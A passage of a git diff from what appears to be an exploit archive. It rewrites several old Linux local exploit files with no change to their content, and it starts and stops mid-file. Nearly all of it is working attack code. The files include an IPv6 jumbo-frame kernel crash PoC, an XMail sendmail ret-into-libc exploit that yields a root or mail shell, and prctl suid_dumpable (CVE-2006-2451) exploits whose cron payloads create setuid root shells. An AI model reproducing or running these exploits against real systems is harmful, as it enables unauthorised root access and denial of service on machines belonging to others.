int*)&dest_mac[0], (unsigned int*)&dest_mac[1], - (unsigned int*)&dest_mac[2], (unsigned int*)&dest_mac[3], - (unsigned int*)&dest_mac[4], (unsigned int*)&dest_mac[5]); - - /* handle interface */ - unsigned char *iface; - iface = argv[3]; - - /* buffer for ethernet frame */ - void *buffer = (void*)malloc(MY_FRAME_LEN); - - /* pointer to ethenet header */ - unsigned char *etherhead = buffer; - struct ethhdr *eh = (struct ethhdr *)etherhead; - - /* our MAC address */ - unsigned char src_mac[6] = { 0x00, 0x11, 0x22, 0x33, 0x44, 0x55 }; - unsigned char src_ip[16] = { 0xfe, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02}; - - /* prepare socket */ - int s; - s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); - if (s < 0) { - printf("cannot create socket: [%d]\n",s); - exit(1); - } - - /* RAW communication */ - struct sockaddr_ll socket_address; - socket_address.sll_family = PF_PACKET; - socket_address.sll_protocol = htons(ETH_P_IP); - socket_address.sll_ifindex = if_nametoindex(iface); - socket_address.sll_hatype = ARPHRD_ETHER; - socket_address.sll_pkttype = PACKET_OTHERHOST; - socket_address.sll_halen = ETH_ALEN; - - /* set the frame header */ - memcpy((void*)buffer, (void*)dest_mac, ETH_ALEN); - memcpy((void*)(buffer+ETH_ALEN), (void*)src_mac, ETH_ALEN); - eh->h_proto = 0xdd86; // IPv6 - - /* the buffer we want to send */ - unsigned char bad_buffer[] = { - 0x60, 0x3b, 0x50, 0x15, 0x04, 0x08, 0x00, 0xa0, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x43, 0x6e, 0xc2, 0x05, 0x23 }; - - memcpy((void*)(buffer+14), (void*)bad_buffer, MY_FRAME_LEN); - - /* overwrite our src and dst ip */ - memcpy((void*)(buffer+22), (void*)src_ip, 16); - memcpy((void*)(buffer+38), dest_ip, 16); - - /* send the buffer */ - int send_result = 0; - send_result = sendto(s, buffer, MY_FRAME_LEN, 0, (struct sockaddr*)&socket_address, sizeof(socket_address)); - if (send_result == -1) { - printf("could not send frame: [%d]\n", send_result); - exit(1); - } - else printf("frame send to ip [%s] with mac [%s] on iface [%s]\n",argv[1],argv[2],argv[3]); - - return 0; -} - -// milw0rm.com [2008-01-11] +/* + * Clemens Kurtenbach + * PoC code for exploiting the jumbo bug found in + * linux kernels >=2.6.20 and <=2.6.21.1 + * gcc -O2 ipv6_jumbo_crash.c -o ipv6_jumbo_crash + * + */ + + +/* io */ +#include +#include +#include + +/* network */ +#include +#include +#include +#include +#include +#include + +#define MY_FRAME_LEN 1145 + +char *resolve6(unsigned char *target) { + char *ret_addr; + struct in6_addr my_in6; + char *glob_addr = (char *) &my_in6; + struct addrinfo addr_hints, *addr_result; + unsigned char out[64]; + + memset(&addr_hints, 0, sizeof(addr_hints)); + addr_hints.ai_family = AF_INET6; + + if (getaddrinfo(target, NULL, &addr_hints, &addr_result) != 0) { + printf("getaddrinfo() error\n"); + exit(1); + } + if(getnameinfo(addr_result->ai_addr, addr_result->ai_addrlen, out, sizeof(out), NULL, 0, NI_NUMERICHOST) != 0){ + printf("getnameinfo() error\n"); + exit(1); + } + if(inet_pton(AF_INET6, out, glob_addr) < 0) { + printf("inet_pton() error\n"); + exit(1); + } + if((ret_addr = malloc(16)) == NULL) { + printf("malloc() error\n"); + exit(1); + } + memcpy(ret_addr, my_in6.s6_addr, 16); + return ret_addr; +} + +int main(int argc, char *argv[]) { + + if (argc < 4) { + printf("usage: ./ipv6_jumbo_crash <00:11:22:33:44:55> \n"); + exit(1); + } + + /* handle IPv6 destination */ + unsigned char *dest_ip = resolve6(argv[1]); + + /* handle MAC */ + unsigned char dest_mac[7]; + sscanf(argv[2], "%x:%x:%x:%x:%x:%x", + (unsigned int*)&dest_mac[0], (unsigned int*)&dest_mac[1], + (unsigned int*)&dest_mac[2], (unsigned int*)&dest_mac[3], + (unsigned int*)&dest_mac[4], (unsigned int*)&dest_mac[5]); + + /* handle interface */ + unsigned char *iface; + iface = argv[3]; + + /* buffer for ethernet frame */ + void *buffer = (void*)malloc(MY_FRAME_LEN); + + /* pointer to ethenet header */ + unsigned char *etherhead = buffer; + struct ethhdr *eh = (struct ethhdr *)etherhead; + + /* our MAC address */ + unsigned char src_mac[6] = { 0x00, 0x11, 0x22, 0x33, 0x44, 0x55 }; + unsigned char src_ip[16] = { 0xfe, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02}; + + /* prepare socket */ + int s; + s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); + if (s < 0) { + printf("cannot create socket: [%d]\n",s); + exit(1); + } + + /* RAW communication */ + struct sockaddr_ll socket_address; + socket_address.sll_family = PF_PACKET; + socket_address.sll_protocol = htons(ETH_P_IP); + socket_address.sll_ifindex = if_nametoindex(iface); + socket_address.sll_hatype = ARPHRD_ETHER; + socket_address.sll_pkttype = PACKET_OTHERHOST; + socket_address.sll_halen = ETH_ALEN; + + /* set the frame header */ + memcpy((void*)buffer, (void*)dest_mac, ETH_ALEN); + memcpy((void*)(buffer+ETH_ALEN), (void*)src_mac, ETH_ALEN); + eh->h_proto = 0xdd86; // IPv6 + + /* the buffer we want to send */ + unsigned char bad_buffer[] = { + 0x60, 0x3b, 0x50, 0x15, 0x04, 0x08, 0x00, 0xa0, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x43, 0x6e, 0xc2, 0x05, 0x23 }; + + memcpy((void*)(buffer+14), (void*)bad_buffer, MY_FRAME_LEN); + + /* overwrite our src and dst ip */ + memcpy((void*)(buffer+22), (void*)src_ip, 16); + memcpy((void*)(buffer+38), dest_ip, 16); + + /* send the buffer */ + int send_result = 0; + send_result = sendto(s, buffer, MY_FRAME_LEN, 0, (struct sockaddr*)&socket_address, sizeof(socket_address)); + if (send_result == -1) { + printf("could not send frame: [%d]\n", send_result); + exit(1); + } + else printf("frame send to ip [%s] with mac [%s] on iface [%s]\n",argv[1],argv[2],argv[3]); + + return 0; +} + +// milw0rm.com [2008-01-11] diff --git a/platforms/linux/local/1267.c b/platforms/linux/local/1267.c index 882c53149..2b56942dd 100755 --- a/platforms/linux/local/1267.c +++ b/platforms/linux/local/1267.c @@ -1,251 +1,251 @@ -/* -* XMail 1.21 'sendmail' local exploit (ret-into-libc) -* Yields uid root || gid mail -* By qaaz [at] centrum [dot] cz, 2005 -*/ -#include -#include -#include -#include -#include -#include -#include -#include - - -#define TARGET "/var/MailRoot/bin/sendmail" - -#define NM "nm" -#define GREP "grep" -#define MKDIR "mkdir" -#define TMP "/tmp" -#define MAILROOT TMP"/mr" - -#define ID "/usr/bin/id" -#define SH "/bin/sh" - -#define OVERLEN (256+12 + 16) -/* EmitRecipients() stack */ -/* | locals + padding + PUSHes | RET | Arg1... | */ -/* |<--------- OVERLEN ------->| */ - -#define MAX(x,y) (((x)>(y)) ? (x) : (y)) - -char *libc_file = NULL; -unsigned int libc_base = 0; -unsigned int stack_base = 0; - -unsigned int file_addr = 0; -unsigned int system_addr = 0; - -int pid; -int pi[2], po[2], pe[2]; - -void sigchild(int sig) -{ -if (waitpid(pid, NULL, WNOHANG) == pid) { -printf("[*] Vuln terminated\n"); -exit(-1); -} -} - -void killchild() -{ -if (pid) kill(pid, SIGKILL); -} - -char bad_chars(char *buf, int len) -{ -int i; -if (len == 0) len == strlen(buf); -for (i = 0; i < len; i++) { -if (!buf[i] || strchr("<> \t,\":;'\r\n", buf[i])) -return buf[i]; -} -return 0; -} - -unsigned int get_sym(char *lib, char *sym) -{ -FILE *f; -char buf[1024]; -unsigned int val = 0; - -sprintf(buf, "%s -D %s | %s -w %s", NM, lib, GREP, sym); -if (f = popen(buf, "r")) { -fgets(buf, sizeof(buf), f); -sscanf(buf, "%08lx %*s %*s", &val); -pclose(f); -} -return val; -} - -unsigned int check_sym(char *lib, char *sym, unsigned int base) -{ -unsigned int offs = get_sym(lib, sym); -unsigned int addr = base + offs; - -if (!offs) { -printf("[-] %s: not found?\n", sym); -return 0; -} -if (bad_chars((char *) &addr, 4)) { -printf("[-] %s: 0x%08x, bad chars\n", sym, addr); -return 0; -} -printf("[+] %s: 0x%08x\n", sym, addr); -return addr; -} - -void do_maps(int pid) -{ -FILE *f; -char buf[1024]; - -sprintf(buf, "/proc/%d/maps", pid); -if (!(f = fopen(buf, "r"))) return; - -while (fgets(buf, sizeof(buf), f)) { -unsigned int addr_beg, addr_end; -char pathname[1024]; -int offset; - -pathname[0] = 0; -sscanf(buf, "%08lx-%08lx %*s %08lx %*s %*s %s", -&addr_beg, &addr_end, &offset, pathname); - -if (offset < 0) -stack_base = addr_end; -else if (strstr(pathname, "/libc") && (!libc_base || addr_beg < libc_base)) -libc_base = addr_beg, libc_file = (char *) strdup(pathname); -} -fclose(f); -} - -void do_syms() -{ -if (!(file_addr = check_sym(libc_file, "stdout", libc_base)) -&& !(file_addr = check_sym(libc_file, "stderr", libc_base)) -&& !(file_addr = check_sym(libc_file, "stdin", libc_base))) { -printf("[-] Can't use std files\n"); -exit(-1); -} - -if (!(system_addr = check_sym(libc_file, "system", libc_base))) { -printf("[-] Can't use system()\n"); -exit(-1); -} -} - -void do_shell() -{ -fd_set fds; -struct timeval tv; -int retval, maxfd; -char buf[1024]; - -maxfd = MAX(0, MAX(po[0], pe[0])) + 1; - -while (1) { -FD_ZERO(&fds); -FD_SET(0, &fds); -FD_SET(po[0], &fds); -FD_SET(pe[0], &fds); -tv.tv_sec = 0; -tv.tv_usec = 100; - -if (select(maxfd, &fds, NULL, NULL, &tv) == -1) break; - -if (FD_ISSET(0, &fds)) { -if ((retval = read(0, buf, sizeof(buf))) <= 0) break; -write(pi[1], buf, retval); -} -if (FD_ISSET(po[0], &fds)) { -if ((retval = read(po[0], buf, sizeof(buf))) <= 0) break; -write(1, buf, retval); -} -if (FD_ISSET(pe[0], &fds)) { -if ((retval = read(pe[0], buf, sizeof(buf))) <= 0) break; -write(2, buf, retval); -} -} -} - -int main(int argc, char *argv[]) -{ -if (argc > 1 && !strcmp(argv[1], "-sh")) { -setresuid(geteuid(), geteuid(), geteuid()); -setresgid(getegid(), getegid(), getegid()); -system(ID); -execl(SH, SH, "-i", NULL); -perror("execl"); -exit(-1); -} - -if (pipe(pi) || pipe(po) || pipe(pe)) { -perror("[-] pipe"); -return -1; -} - -if ((pid = fork()) == -1) { -perror("[-] fork"); -return -1; -} - -if (pid) { -unsigned int i; -char buf[10*1024]; - -atexit(killchild); -signal(SIGCHLD, sigchild); -sleep(1); - -printf("[*] Reading maps...\n"); -do_maps(pid); -printf("[%c] libc: 0x%08x\n", libc_base?'+':'-', libc_base); -if (!libc_base) exit(-1); -printf("[%c] stack: 0x%08x\n", stack_base?'+':'-', stack_base); -if (!stack_base) exit(-1); - -printf("[*] Getting symbols...\n"); -do_syms(); - -strcpy(buf, "To: h4h4@"); -for (i = 0; i < OVERLEN-5; i++) // "h4h4@" == 5 -strcat(buf, "A"); -strncat(buf, (char *) &system_addr, 4); -strncat(buf, (char *) &file_addr, 4); -i = stack_base - 5000; -strncat(buf, (char *) &i, 4); -strcat(buf, "\n"); - -write(pi[1], buf, strlen(buf)); -sleep(1); do_shell(); -printf("[*] Done\n"); -exit(1); -} -else { -char buf[10*1024]; -char *_env[3] = { NULL, "MAIL_ROOT="MAILROOT, NULL }; -char *_arg[3] = { TARGET, "-t", NULL }; - -sprintf(buf, "%s -p %s/spool/temp", MKDIR, MAILROOT); -system(buf); - -sprintf(buf, "%10000s -sh", argv[0]); -_env[0] = (char *) strdup(buf); - -printf("[*] Executing vuln...\n"); - -close(0); dup2(pi[0], 0); -close(1); dup2(po[1], 1); -close(2); dup2(pe[1], 2); -execve(_arg[0], _arg, _env); -perror("[-] execve"); -return -1; -} - -exit(1); -} - -// milw0rm.com [2005-10-20] +/* +* XMail 1.21 'sendmail' local exploit (ret-into-libc) +* Yields uid root || gid mail +* By qaaz [at] centrum [dot] cz, 2005 +*/ +#include +#include +#include +#include +#include +#include +#include +#include + + +#define TARGET "/var/MailRoot/bin/sendmail" + +#define NM "nm" +#define GREP "grep" +#define MKDIR "mkdir" +#define TMP "/tmp" +#define MAILROOT TMP"/mr" + +#define ID "/usr/bin/id" +#define SH "/bin/sh" + +#define OVERLEN (256+12 + 16) +/* EmitRecipients() stack */ +/* | locals + padding + PUSHes | RET | Arg1... | */ +/* |<--------- OVERLEN ------->| */ + +#define MAX(x,y) (((x)>(y)) ? (x) : (y)) + +char *libc_file = NULL; +unsigned int libc_base = 0; +unsigned int stack_base = 0; + +unsigned int file_addr = 0; +unsigned int system_addr = 0; + +int pid; +int pi[2], po[2], pe[2]; + +void sigchild(int sig) +{ +if (waitpid(pid, NULL, WNOHANG) == pid) { +printf("[*] Vuln terminated\n"); +exit(-1); +} +} + +void killchild() +{ +if (pid) kill(pid, SIGKILL); +} + +char bad_chars(char *buf, int len) +{ +int i; +if (len == 0) len == strlen(buf); +for (i = 0; i < len; i++) { +if (!buf[i] || strchr("<> \t,\":;'\r\n", buf[i])) +return buf[i]; +} +return 0; +} + +unsigned int get_sym(char *lib, char *sym) +{ +FILE *f; +char buf[1024]; +unsigned int val = 0; + +sprintf(buf, "%s -D %s | %s -w %s", NM, lib, GREP, sym); +if (f = popen(buf, "r")) { +fgets(buf, sizeof(buf), f); +sscanf(buf, "%08lx %*s %*s", &val); +pclose(f); +} +return val; +} + +unsigned int check_sym(char *lib, char *sym, unsigned int base) +{ +unsigned int offs = get_sym(lib, sym); +unsigned int addr = base + offs; + +if (!offs) { +printf("[-] %s: not found?\n", sym); +return 0; +} +if (bad_chars((char *) &addr, 4)) { +printf("[-] %s: 0x%08x, bad chars\n", sym, addr); +return 0; +} +printf("[+] %s: 0x%08x\n", sym, addr); +return addr; +} + +void do_maps(int pid) +{ +FILE *f; +char buf[1024]; + +sprintf(buf, "/proc/%d/maps", pid); +if (!(f = fopen(buf, "r"))) return; + +while (fgets(buf, sizeof(buf), f)) { +unsigned int addr_beg, addr_end; +char pathname[1024]; +int offset; + +pathname[0] = 0; +sscanf(buf, "%08lx-%08lx %*s %08lx %*s %*s %s", +&addr_beg, &addr_end, &offset, pathname); + +if (offset < 0) +stack_base = addr_end; +else if (strstr(pathname, "/libc") && (!libc_base || addr_beg < libc_base)) +libc_base = addr_beg, libc_file = (char *) strdup(pathname); +} +fclose(f); +} + +void do_syms() +{ +if (!(file_addr = check_sym(libc_file, "stdout", libc_base)) +&& !(file_addr = check_sym(libc_file, "stderr", libc_base)) +&& !(file_addr = check_sym(libc_file, "stdin", libc_base))) { +printf("[-] Can't use std files\n"); +exit(-1); +} + +if (!(system_addr = check_sym(libc_file, "system", libc_base))) { +printf("[-] Can't use system()\n"); +exit(-1); +} +} + +void do_shell() +{ +fd_set fds; +struct timeval tv; +int retval, maxfd; +char buf[1024]; + +maxfd = MAX(0, MAX(po[0], pe[0])) + 1; + +while (1) { +FD_ZERO(&fds); +FD_SET(0, &fds); +FD_SET(po[0], &fds); +FD_SET(pe[0], &fds); +tv.tv_sec = 0; +tv.tv_usec = 100; + +if (select(maxfd, &fds, NULL, NULL, &tv) == -1) break; + +if (FD_ISSET(0, &fds)) { +if ((retval = read(0, buf, sizeof(buf))) <= 0) break; +write(pi[1], buf, retval); +} +if (FD_ISSET(po[0], &fds)) { +if ((retval = read(po[0], buf, sizeof(buf))) <= 0) break; +write(1, buf, retval); +} +if (FD_ISSET(pe[0], &fds)) { +if ((retval = read(pe[0], buf, sizeof(buf))) <= 0) break; +write(2, buf, retval); +} +} +} + +int main(int argc, char *argv[]) +{ +if (argc > 1 && !strcmp(argv[1], "-sh")) { +setresuid(geteuid(), geteuid(), geteuid()); +setresgid(getegid(), getegid(), getegid()); +system(ID); +execl(SH, SH, "-i", NULL); +perror("execl"); +exit(-1); +} + +if (pipe(pi) || pipe(po) || pipe(pe)) { +perror("[-] pipe"); +return -1; +} + +if ((pid = fork()) == -1) { +perror("[-] fork"); +return -1; +} + +if (pid) { +unsigned int i; +char buf[10*1024]; + +atexit(killchild); +signal(SIGCHLD, sigchild); +sleep(1); + +printf("[*] Reading maps...\n"); +do_maps(pid); +printf("[%c] libc: 0x%08x\n", libc_base?'+':'-', libc_base); +if (!libc_base) exit(-1); +printf("[%c] stack: 0x%08x\n", stack_base?'+':'-', stack_base); +if (!stack_base) exit(-1); + +printf("[*] Getting symbols...\n"); +do_syms(); + +strcpy(buf, "To: h4h4@"); +for (i = 0; i < OVERLEN-5; i++) // "h4h4@" == 5 +strcat(buf, "A"); +strncat(buf, (char *) &system_addr, 4); +strncat(buf, (char *) &file_addr, 4); +i = stack_base - 5000; +strncat(buf, (char *) &i, 4); +strcat(buf, "\n"); + +write(pi[1], buf, strlen(buf)); +sleep(1); do_shell(); +printf("[*] Done\n"); +exit(1); +} +else { +char buf[10*1024]; +char *_env[3] = { NULL, "MAIL_ROOT="MAILROOT, NULL }; +char *_arg[3] = { TARGET, "-t", NULL }; + +sprintf(buf, "%s -p %s/spool/temp", MKDIR, MAILROOT); +system(buf); + +sprintf(buf, "%10000s -sh", argv[0]); +_env[0] = (char *) strdup(buf); + +printf("[*] Executing vuln...\n"); + +close(0); dup2(pi[0], 0); +close(1); dup2(po[1], 1); +close(2); dup2(pe[1], 2); +execve(_arg[0], _arg, _env); +perror("[-] execve"); +return -1; +} + +exit(1); +} + +// milw0rm.com [2005-10-20] diff --git a/platforms/linux/local/140.c b/platforms/linux/local/140.c index 30fd54341..470d43e6f 100755 --- a/platforms/linux/local/140.c +++ b/platforms/linux/local/140.c @@ -44,6 +44,6 @@ int main (int argc, char ** argv) memcpy((char *)out+63, shellcode, strlen(shellcode)); execl (BIN, BIN, "-xsokdir", out, 0x0); -} - -// milw0rm.com [2004-01-02] +} + +// milw0rm.com [2004-01-02] diff --git a/platforms/linux/local/2004.c b/platforms/linux/local/2004.c index 9f521be8f..d35a7605c 100755 --- a/platforms/linux/local/2004.c +++ b/platforms/linux/local/2004.c @@ -1,52 +1,52 @@ -/*****************************************************/ -/* Local r00t Exploit for: */ -/* Linux Kernel PRCTL Core Dump Handling */ -/* ( BID 18874 / CVE-2006-2451 ) */ -/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */ -/* By: */ -/* - dreyer (main PoC code) */ -/* - RoMaNSoFt (local root code) */ -/* [ 10.Jul.2006 ] */ -/*****************************************************/ - -#include -#include -#include -#include -#include -#include -#include -#include - -char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n"; - -int main() { - int child; - struct rlimit corelimit; - printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n"); - printf("By: dreyer & RoMaNSoFt\n"); - printf("[ 10.Jul.2006 ]\n\n"); - - corelimit.rlim_cur = RLIM_INFINITY; - corelimit.rlim_max = RLIM_INFINITY; - setrlimit(RLIMIT_CORE, &corelimit); - - printf("[*] Creating Cron entry\n"); - - if ( !( child = fork() )) { - chdir("/etc/cron.d"); - prctl(PR_SET_DUMPABLE, 2); - sleep(200); - exit(1); - } - - kill(child, SIGSEGV); - - printf("[*] Sleeping for aprox. one minute (** please wait **)\n"); - sleep(62); - - printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n"); - system("/tmp/sh -i"); -} - -// milw0rm.com [2006-07-11] +/*****************************************************/ +/* Local r00t Exploit for: */ +/* Linux Kernel PRCTL Core Dump Handling */ +/* ( BID 18874 / CVE-2006-2451 ) */ +/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */ +/* By: */ +/* - dreyer (main PoC code) */ +/* - RoMaNSoFt (local root code) */ +/* [ 10.Jul.2006 ] */ +/*****************************************************/ + +#include +#include +#include +#include +#include +#include +#include +#include + +char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n"; + +int main() { + int child; + struct rlimit corelimit; + printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n"); + printf("By: dreyer & RoMaNSoFt\n"); + printf("[ 10.Jul.2006 ]\n\n"); + + corelimit.rlim_cur = RLIM_INFINITY; + corelimit.rlim_max = RLIM_INFINITY; + setrlimit(RLIMIT_CORE, &corelimit); + + printf("[*] Creating Cron entry\n"); + + if ( !( child = fork() )) { + chdir("/etc/cron.d"); + prctl(PR_SET_DUMPABLE, 2); + sleep(200); + exit(1); + } + + kill(child, SIGSEGV); + + printf("[*] Sleeping for aprox. one minute (** please wait **)\n"); + sleep(62); + + printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n"); + system("/tmp/sh -i"); +} + +// milw0rm.com [2006-07-11] diff --git a/platforms/linux/local/2005.c b/platforms/linux/local/2005.c index 38bed9446..28f273b66 100755 --- a/platforms/linux/local/2005.c +++ b/platforms/linux/local/2005.c @@ -1,127 +1,127 @@ -/* Linux >= 2.6.13 prctl kernel exploit - * - * (C) Julien TINNES - * - * If you read the Changelog from 2.6.13 you've probably seen: - * [PATCH] setuid core dump - * - * This patch mainly adds suidsafe to suid_dumpable sysctl but also a new per process, - * user setable argument to PR_SET_DUMPABLE. - * - * This flaw allows us to create a root owned coredump into any directory. - * This is trivially exploitable. - * - */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define CROND "/etc/cron.d" -#define BUFSIZE 2048 - - -struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY}; - -char crontemplate[]= -"#/etc/cron.d/core suid_dumpable exploit\n" -"SHELL=/bin/sh\n" -"PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n" -"#%s* * * * * root chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %d\n"; - -char cronstring[BUFSIZE]; -char fname[BUFSIZE]; - -struct timeval te; - -void sh(int sn) { - execl(fname, fname, (char *) NULL); -} - - -int main(int argc, char *argv[]) { - - int nw, pid; - - if (geteuid() == 0) { - printf("[+] getting root shell\n"); - setuid(0); - setgid(0); - if (execl("/bin/sh", "/bin/sh", (char *) NULL)) { - perror("[-] execle"); - return 1; - } - } - - printf("\nprctl() suidsafe exploit\n\n(C) Julien TINNES\n\n"); - - /* get our file name */ - if (readlink("/proc/self/exe", fname, sizeof(fname)) == -1) { - perror("[-] readlink"); - printf("This is not fatal, rewrite the exploit\n"); - } - - if (signal(SIGUSR1, sh) == SIG_ERR) { - perror("[-] signal"); - return 1; - } - printf("[+] Installed signal handler\n"); - - /* Let us create core files */ - setrlimit(RLIMIT_CORE, &myrlimit); - if (chdir(CROND) == -1) { - perror("[-] chdir"); - return 1; - } - - /* exploit the flaw */ - if (prctl(PR_SET_DUMPABLE, 2) == -1) { - perror("[-] prtctl"); - printf("Is you kernel version >= 2.6.13 ?\n"); - return 1; - } - - printf("[+] We are suidsafe dumpable!\n"); - - /* Forge the string for our core dump */ - nw=snprintf(cronstring, sizeof(cronstring), crontemplate, "\n", fname, fname, CROND"/core", getpid()); - if (nw >= sizeof(cronstring)) { - printf("[-] cronstring is too small\n"); - return 1; - } - printf("[+] Malicious string forged\n"); - - if ((pid=fork()) == -1) { - perror("[-] fork"); - return 1; - } - - if (pid == 0) { - /* This is not the good way to do it ;) */ - sleep(120); - exit(0); - } - - /* SEGFAULT the child */ - printf("[+] Segfaulting child\n"); - if (kill(pid, 11) == -1) { - perror("[-] kill"); - return 1; - } - if (gettimeofday(&te, NULL) == 0) - printf("[+] Waiting for exploit to succeed (~%ld seconds)\n", 60 - (te.tv_sec%60)); - sleep(120); - - printf("[-] It looks like the exploit failed\n"); - - return 1; -} - -// milw0rm.com [2006-07-12] +/* Linux >= 2.6.13 prctl kernel exploit + * + * (C) Julien TINNES + * + * If you read the Changelog from 2.6.13 you've probably seen: + * [PATCH] setuid core dump + * + * This patch mainly adds suidsafe to suid_dumpable sysctl but also a new per process, + * user setable argument to PR_SET_DUMPABLE. + * + * This flaw allows us to create a root owned coredump into any directory. + * This is trivially exploitable. + * + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define CROND "/etc/cron.d" +#define BUFSIZE 2048 + + +struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY}; + +char crontemplate[]= +"#/etc/cron.d/core suid_dumpable exploit\n" +"SHELL=/bin/sh\n" +"PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n" +"#%s* * * * * root chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %d\n"; + +char cronstring[BUFSIZE]; +char fname[BUFSIZE]; + +struct timeval te; + +void sh(int sn) { + execl(fname, fname, (char *) NULL); +} + + +int main(int argc, char *argv[]) { + + int nw, pid; + + if (geteuid() == 0) { + printf("[+] getting root shell\n"); + setuid(0); + setgid(0); + if (execl("/bin/sh", "/bin/sh", (char *) NULL)) { + perror("[-] execle"); + return 1; + } + } + + printf("\nprctl() suidsafe exploit\n\n(C) Julien TINNES\n\n"); + + /* get our file name */ + if (readlink("/proc/self/exe", fname, sizeof(fname)) == -1) { + perror("[-] readlink"); + printf("This is not fatal, rewrite the exploit\n"); + } + + if (signal(SIGUSR1, sh) == SIG_ERR) { + perror("[-] signal"); + return 1; + } + printf("[+] Installed signal handler\n"); + + /* Let us create core files */ + setrlimit(RLIMIT_CORE, &myrlimit); + if (chdir(CROND) == -1) { + perror("[-] chdir"); + return 1; + } + + /* exploit the flaw */ + if (prctl(PR_SET_DUMPABLE, 2) == -1) { + perror("[-] prtctl"); + printf("Is you kernel version >= 2.6.13 ?\n"); + return 1; + } + + printf("[+] We are suidsafe dumpable!\n"); + + /* Forge the string for our core dump */ + nw=snprintf(cronstring, sizeof(cronstring), crontemplate, "\n", fname, fname, CROND"/core", getpid()); + if (nw >= sizeof(cronstring)) { + printf("[-] cronstring is too small\n"); + return 1; + } + printf("[+] Malicious string forged\n"); + + if ((pid=fork()) == -1) { + perror("[-] fork"); + return 1; + } + + if (pid == 0) { + /* This is not the good way to do it ;) */ + sleep(120); + exit(0); + } + + /* SEGFAULT the child */ + printf("[+] Segfaulting child\n"); + if (kill(pid, 11) == -1) { + perror("[-] kill"); + return 1; + } + if (gettimeofday(&te, NULL) == 0) + printf("[+] Waiting for exploit to succeed (~%ld seconds)\n", 60 - (te.tv_sec%60)); + sleep(120); + + printf("[-] It looks like the exploit failed\n"); + + return 1; +} + +// milw0rm.com [2006-07-12] diff --git a/platforms/linux/local/2006.c b/platforms/linux/local/2006.c index 9286c6820..d0c6d1310 100755 --- a/platforms/linux/local/2006.c +++ b/platforms/linux/local/2006.c @@ -1,111 +1,111 @@ -/* - * $Id: raptor_prctl.c,v 1.1 2006/07/13 14:21:43 raptor Exp $ - * - * raptor_prctl.c - Linux 2.6.x suid_dumpable vulnerability - * Copyright (c) 2006 Marco Ivaldi - * - * The suid_dumpable support in Linux kernel 2.6.13 up to versions before - * 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial - * of service (disk consumption) and POSSIBILY (yeah, sure;) gain privileges - * via the PR_SET_DUMPABLE argument of the prctl function and a program that - * causes a core dump file to be created in a directory for which the user does - * not have permissions (CVE-2006-2451). - * - * Berlin, Sunday July 9th 2006: CAMPIONI DEL MONDO! CAMPIONI DEL MONDO! - * CAMPIONI DEL MONDO! (i was tempted to name this exploit "pajolo.c";)) - * - * Greets to Paul Starzetz and Roman Medina, who also exploited this ugly bug. - * - * NOTE. This exploit uses the Vixie's crontab /etc/cron.d attack vector: this - * means that distributions that use a different configuration (namely Dillon's - * crontab on Slackware Linux) can be vulnerable but not directly exploitable. - * - * Usage: - * $ gcc raptor_prctl.c -o raptor_prctl -Wall - * [exploit must be dinamically linked] - * $ ./raptor_prctl - * [...] - * sh-3.00# - * - * Vulnerable platforms: - * Linux from 2.6.13 up to 2.6.17.4 [tested on SuSE Linux 2.6.13-15.8-default] - */ - -#include -#include -#include -#include -#include -#include -#include - -#define INFO1 "raptor_prctl.c - Linux 2.6.x suid_dumpable vulnerability" -#define INFO2 "Copyright (c) 2006 Marco Ivaldi " - -char payload[] = /* commands to be executed by privileged crond */ -"\nSHELL=/bin/sh\nPATH=/usr/bin:/usr/sbin:/sbin:/bin\n* * * * * root chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/cron.d/core\n"; - -char pwnage[] = /* build setuid() helper to circumvent bash checks */ -"echo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > /tmp/pwned.c; gcc /tmp/pwned.c -o /tmp/pwned &>/dev/null; rm -f /tmp/pwned.c"; - -int main(void) -{ - int pid, i; - struct rlimit corelimit; - struct stat st; - - /* print exploit information */ - fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); - - /* prepare the setuid() helper */ - system(pwnage); - - /* set core size to unlimited */ - 